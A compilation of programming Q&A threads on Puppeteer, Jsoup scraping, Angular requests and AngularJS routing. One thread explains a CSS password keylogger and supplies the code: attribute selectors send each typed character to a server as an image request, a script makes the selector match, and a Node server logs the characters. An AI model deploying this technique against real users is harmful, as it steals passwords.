Specific XPath is not working in Puppeteer

I have a specific XPath that's not working. I'm waiting for the XPath to appear, but for some reason I still can't get it.
Here is the XPath I'm using:
'//*[@id="settings"]/div[6]/div[2]/div[2]/div/div[3]/div/form/div[4]/div/div[2]/button[contains(text(), "Save")]'
To confirm that this XPath is on the page, I go to my console and evaluate it:
$x('//*[@id="settings"]/div[6]/div[2]/div[2]/div/div[3]/div/form/div[4]/div/div[2]/button[contains(text(), "Save")]')
Then I get this:
[button.ml3-sm.mb1-sm.css-17hmqcn.ex41m6f0.primary]
0: button.ml3-sm.mb1-sm.css-17hmqcn.ex41m6f0.primary
My code is as follows:
await page.waitForXPath('//*[@id="settings"]/div[6]/div[2]/div[2]/div/div[3]/div/form/div[4]/div/div[2]/button[contains(text(), "Save")]');
const [setting] = await page.$x('//*[@id="settings"]/div[6]/div[2]/div[2]/div/div[3]/div/form/div[4]/div/div[2]/button[contains(text(), "Save")]');
if(setting) setting.click();
I await the element, I can see it visually on the page, and, as I mentioned above, I can evaluate it in the console, but the click never fires.
I've also tried this:
setting[0].click()
Any idea what I'm missing?

Your selector is most likely fine, especially since you've been able to validate it in the Chrome DevTools console.
I think you just need to await the click:
if(setting) await setting.click();
Or, if you don't destructure the result of page.$x(), use the element at index [0]:
await setting[0].click();
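Putting it together, a minimal sketch of the corrected flow (assuming page is already on the settings page, and using the XPath from the question):

const xpath = '//*[@id="settings"]/div[6]/div[2]/div[2]/div/div[3]/div/form/div[4]/div/div[2]/button[contains(text(), "Save")]';

await page.waitForXPath(xpath);
const [setting] = await page.$x(xpath);
// ElementHandle.click() returns a promise, so it must be awaited
if (setting) await setting.click();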

Related

How do you make a Keylogger with CSS?

input[type="password"][value$="a"] {
background-image: url("http://localhost:3000/a");
}
const inp = document.querySelector("input");
inp.addEventListener("keyup", (e) => {
inp.setAttribute('value', inp.value)
});
This is what I've found, but I don't think it works. How do I do it?
Edit: I realised that the CSS snippet won't work on its own, as typing in the input field will not change the value attribute of the HTML element. A JavaScript function is required to do this. Hence, include the JavaScript part of the snippet in a script tag and then it should work.
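For reference, a minimal self-contained page combining both snippets might look like this (the localhost URL is the placeholder server from the CSS above). Note that this only captures the letter "a"; a real attack would need one such rule per character:

<input type="password">
<style>
  input[type="password"][value$="a"] {
    background-image: url("http://localhost:3000/a");
  }
</style>
<script>
  // mirror the typed value into the value attribute so the CSS selector can match
  const inp = document.querySelector("input");
  inp.addEventListener("keyup", (e) => {
    inp.setAttribute('value', inp.value);
  });
</script>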
The CSS Keylogger was originally a thought experiment as explained in this LiveOverflow video. The snippet you are using is assuming that http://localhost:3000/ is a malicious Web server which records your HTTP requests.
In this case, entering "a" on the keyboard (in the input field) would send a request to http://localhost:3000/a (to fetch the background image), which you can intercept as "a" on the Web server. You could write a Node.js or Python Web server to intercept these requests and recover the keystrokes.
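As a rough sketch of such a server in Node (no external dependencies; port 3000 matches the snippet above):

const http = require('http');

http.createServer((req, res) => {
  // each background-image fetch arrives as e.g. GET /a, so the path is the keystroke
  console.log('keystroke:', req.url.slice(1));
  res.writeHead(204); // no image needs to be returned
  res.end();
}).listen(3000);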

Jsoup - hidden div class?

I'm trying to scrape a div class, but everything I have tried has failed so far :(
I'm trying to scrape the element(s):
<a href="http://www.bellator.com/events/d306b5/bellator-newcastle-pitbull-vs-scope"><div class="s_buttons_button s_buttons_buttonAlt s_buttons_buttonSlashBack">More info</div></a>
from the website: http://www.bellator.com/events
I tried accessing the list of elements by doing
Elements elements = document.select("div[class=s_container] > li");
but that didn't return anything.
Then I tried accessing just the parent with
Elements elements = document.select("div[class=s_container]");
and that returned two divs with the class name "s_container", none of which is the one I need :<
Then I tried accessing that one's parent with
Elements elements = document.select("div[class=ent_m152_bellator module ent_m152_bellator_V1_1_0 ent_m152]");
and that didn't return anything.
I also tried
Elements elements = document.select("div[class=ent_m152_bellator]");
because I wasn't sure about the whitespace, but it didn't return anything either.
Then I tried accessing its parent with
Elements elements = document.select("div#t3_lc");
and that worked, but it returned an element containing
<div id="t3_lc">
<div class="triforce-module" id="t3_lc_promo1"></div>
</div>
which is kinda weird, because I can't see that it has that child when I inspect the website in Chrome :S
Does anyone know what's going on? I feel kinda lost...
What you see in your web browser is not what Jsoup sees. Disable JavaScript and refresh the page to get what Jsoup gets, OR press CTRL+U ("Show source", not "Inspect"!) in your browser to see the original HTML document before JavaScript modifications. Your browser's inspector shows the final document after those modifications, so it's not suitable for your needs.
It seems like the whole "UPCOMING EVENTS" section is dynamically loaded by JavaScript.
Even more, this section is loaded asynchronously with AJAX. You can use your browser's debugger (Network tab) to see every request and response.
I found it, but unfortunately all the data you need is returned as JSON, so you're going to need another library to parse it.
That's not the end of the bad news, and this case is more complicated. You could make a direct request for the data:
http://www.bellator.com/feeds/ent_m152_bellator/V1_1_0/d10a728c-547e-4a6f-b140-7eecb67cff6b
but the URL seems random, and a few of these URLs (one per upcoming event?) are embedded in the JavaScript code in the HTML.
My approach would be to get the URLs of these feeds with something like:
List<String> feedUrls = new ArrayList<>();
// select all the scripts
Elements scripts = document.select("script");
// a simple pattern (java.util.regex) for the feed URLs seen in the page source; adjust as needed
Pattern feedPattern = Pattern.compile("http://www\\.bellator\\.com/feeds/[^\"'\\s]+");
for (Element script : scripts) {
    Matcher matcher = feedPattern.matcher(script.text());
    while (matcher.find()) {
        feedUrls.add(matcher.group()); // collect every feed URL found in this script
    }
}
for (String feedUrl : feedUrls) {
    // iterate over feed URLs, download each of them; ignoreContentType(true)
    // is needed because the response is JSON, not HTML
    String json = Jsoup.connect(feedUrl).ignoreContentType(true).execute().body();
    // here use a JSON parsing library (e.g. Gson) to get the data you need
}
An ALTERNATIVE approach would be to stop using Jsoup, because of these limitations, and use Selenium WebDriver instead, as it supports dynamic page modifications by JavaScript. You'd get the HTML of the final result - exactly what you see in the web browser and its inspector.
If anyone finds this in the future: I managed to solve it with Selenium. I don't know if it's a good/correct solution, but it seems to be working.
System.setProperty("webdriver.chrome.driver", "C:\\Users\\PC\\Desktop\\Chromedriver\\chromedriver.exe");
WebDriver driver = new ChromeDriver();
driver.get("http://www.bellator.com/events");
String html = driver.getPageSource();
Document doc = Jsoup.parse(html);
Elements elements = doc.select("ul.s_layouts_lineListAlt > li > a");
for (Element element : elements) {
    System.out.println(element.attr("href"));
}
Output:
http://www.bellator.com/events/d306b5/bellator-newcastle-pitbull-vs-scope
http://www.bellator.com/events/ylcu8d/bellator-215-mitrione-vs-kharitonov
http://www.bellator.com/events/yk2djw/bellator-216-mvp-vs-daley
http://www.bellator.com/events/e8rdqs/bellator-217-gallagher-vs-graham
http://www.bellator.com/events/281wxq/bellator-218-sanchez-vs-grimshaw
http://www.bellator.com/events/8lcbdi/bellator-219-koreshkov-vs-larkin
http://www.bellator.com/events/9rqguc/bellator-macdonald-vs-fitch

Using Angular to get the HTML of a website URL

I am new to Angular.
What I am trying to do is get the HTML of a page and reproduce it in an iframe (it is an exercise).
I am using the following piece of code:
var prova = this._http.get(myUrl, {responseType: "text"}).subscribe((x) => {
  console.log(x);
});
I tried it on a website (if needed, I can also include the names of the pages) and it returns the HTML of only some pages.
In the other cases the string x is empty.
Could it depend on the connection?
Is there some way to wait for the GET request to finish?
Or is my approach simply wrong, and should I make a different type of request?
You're most likely going to need a library like Puppeteer if you want to render a page properly. Puppeteer is a Node library and uses headless Chrome, so I am not sure how well you could integrate it with Angular.
https://github.com/GoogleChrome/puppeteer
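If you do go that route, a minimal sketch in plain Node (rather than the Angular app itself; the URL is a placeholder for the page you want to render):

const puppeteer = require('puppeteer');

(async () => {
  const myUrl = 'https://example.com'; // stands in for the page you want to render
  const browser = await puppeteer.launch();
  const page = await browser.newPage();
  // wait until the network is quiet so JavaScript-rendered content is in place
  await page.goto(myUrl, { waitUntil: 'networkidle0' });
  const html = await page.content(); // the fully rendered HTML
  console.log(html);
  await browser.close();
})();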

How to intercept request in Puppeteer before current page is left?

Use case:
We need to capture all outbound routes from a page. Some of them may not be implemented as link elements (<a href="...">) but via some JavaScript code or as GET/POST forms.
PhantomJS:
In PhantomJS we did this using the onNavigationRequested callback. We simply clicked all the elements matched by some selector, used onNavigationRequested to capture the target URL (and possibly the method or POST data in the case of a form), and then cancelled that navigation event.
Puppeteer:
I tried request interception, but at the moment the request gets intercepted, the current page is already lost, so I would have to go back.
Is there a way to capture the navigation event while the browser is still at the page that triggered it, and to stop the event?
Thank you.
You can do the following.
await page.setRequestInterception(true);

page.on('request', request => {
  if (request.resourceType() === 'image')
    request.abort();
  else
    request.continue();
});
Example here:
https://github.com/GoogleChrome/puppeteer/blob/master/examples/block-images.js
Available resource types are listed here:
https://github.com/GoogleChrome/puppeteer/blob/master/docs/api.md#requestresourcetype
So I finally discovered a solution that doesn't require a browser extension and therefore works in headless mode, thanks to this guy: https://github.com/GoogleChrome/puppeteer/issues/823#issuecomment-467408640
// note: request interception must be enabled first via await page.setRequestInterception(true);
// `url` holds the URL of the page that triggered the navigation
page.on('request', req => {
  if (req.isNavigationRequest() && req.frame() === page.mainFrame() && req.url() !== url) {
    // no redirect chain means the navigation is caused by setting `location.href`
    req.respond(req.redirectChain().length
      ? { body: '' }    // prevent 301/302 redirect
      : { status: 204 } // prevent navigation by js
    );
  } else {
    req.continue();
  }
});
EDIT: We have added a helper function to the Apify SDK that implements this - https://sdk.apify.com/docs/api/puppeteer#puppeteer.enqueueLinksByClickingElements
Here is whole source code:
https://github.com/apifytech/apify-js/blob/master/src/enqueue_links/click_elements.js
It's slightly more complicated, as it not only needs to intercept requests but also has to catch newly opened windows, etc.
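Based on the linked docs, usage looks roughly like this (a sketch, not the definitive API; the selector is an assumption, so check the SDK docs for the exact options):

const Apify = require('apify');

Apify.main(async () => {
  const requestQueue = await Apify.openRequestQueue();
  const browser = await Apify.launchPuppeteer();
  const page = await browser.newPage();
  await page.goto('http://www.example.com');
  // clicks everything matching the selector and enqueues the navigation
  // requests it triggers, without actually leaving the page
  await Apify.utils.puppeteer.enqueueLinksByClickingElements({
    page,
    requestQueue,
    selector: 'a',
  });
  await browser.close();
});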
I ran into the same problem. Puppeteer doesn't support this feature at the moment; actually, it's the Chrome DevTools Protocol that doesn't support it. But I found another way to solve it, using a Chrome extension. Related issue: https://github.com/GoogleChrome/puppeteer/issues/823
The author of the issue shared a solution here: https://gist.github.com/GuilloOme/2bd651e5154407d2d2165278d5cd7cdb
As the doc says, you can use chrome.webRequest.onBeforeRequest.addListener to intercept all requests from the page and block them if you want to.
Don't forget to add the following flags to the Puppeteer launch options:
--load-extension=./your_ext/ --disable-extensions-except=./your_ext/
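For example (a sketch; ./your_ext/ is the placeholder path from above, and extensions require a headful browser):

const puppeteer = require('puppeteer');

(async () => {
  const browser = await puppeteer.launch({
    headless: false, // Chrome extensions don't work in classic headless mode
    args: [
      '--load-extension=./your_ext/',
      '--disable-extensions-except=./your_ext/',
    ],
  });
  // ... the extension's chrome.webRequest listener now sees every request
})();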
Call page.setRequestInterception(true);. The documentation has a really thorough example here: https://github.com/GoogleChrome/puppeteer/blob/master/docs/api.md#pagesetrequestinterceptionvalue
Make sure to add some logic like in the example below, where image requests are avoided: you capture each request and then abort or continue it.
page.on('request', interceptedRequest => {
  if (interceptedRequest.url().endsWith('.png') ||
      interceptedRequest.url().endsWith('.jpg'))
    interceptedRequest.abort();
  else
    interceptedRequest.continue();
});

angularjs: best way to force certain link paths to reload

I'd like to be able to catch any link in my site that starts with "/#" and handle it with a full browser reload.
Something like:
$locationProvider.html5Mode(true)
$routeProvider.when("/#:id",
  // window.location.href = [the link's url]
  // all others are handled by a typical controller/view
I have been able to solve the problem using an attribute/directive on an anchor tag, but I'd like to do this at the URL routing level.
I'm not sure if it's the best solution, but you can set a parameter based on the current time instead of the '/#' code; see the sketch after the snippet below.
e.g.
{{customer.Name}}
where 'now' is set on $rootScope after each $routeChangeSuccess:
$rootScope.$on('$routeChangeSuccess', function (event, current, previous) {
  $rootScope.now = Date.now();
});
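The markup of the {{customer.Name}} example above was stripped; as a hedged illustration (the route and fields are hypothetical), the idea is a link like:

<!-- hypothetical route and fields; the point is the changing ?updated= parameter -->
<a href="/customers/{{customer.id}}?updated={{now}}">{{customer.Name}}</a>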
This might be improved, but it's working.
You might also have a look at angularjs - refresh when clicked on link with actual url.